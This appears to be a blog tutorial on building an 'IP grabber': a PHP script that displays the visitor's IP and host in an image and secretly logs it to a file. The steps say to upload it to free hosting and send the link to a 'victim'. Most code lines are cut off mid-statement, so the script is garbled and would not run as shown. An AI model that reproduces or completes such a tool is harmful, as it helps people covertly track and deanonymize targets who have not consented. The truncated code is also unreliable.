Copy the below codes into Notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number
imagefill($img_number,0,0,$bac
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]
$number2 = " Host/Proxy: $hostname";
$number4 = " ______________________________
Imagestring($img_number,10,5,5
Imagestring($img_number,10,5,2
Imagestring($img_number,10,5,4
Imagestring($img_number,10,5,5
Imagestring($img_number,10,8,5
Imagestring($img_number,10,5,1
Imagestring($img_number,10,8,1
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-prot
$file2 = "- IP joined - IP/
fwrite($file, $file2);
fclose($file);
?>
Now make Free account on any of the free web hosting sites Ripway or on My3gb .
Now upload Grab.php to your web hosting site.
Copy the link of your uploaded file and send it to victim.
As soon as victim will click on your link his ip will be saved in your free web hosting site.
Enjoy you are Done !
No comments:
Post a Comment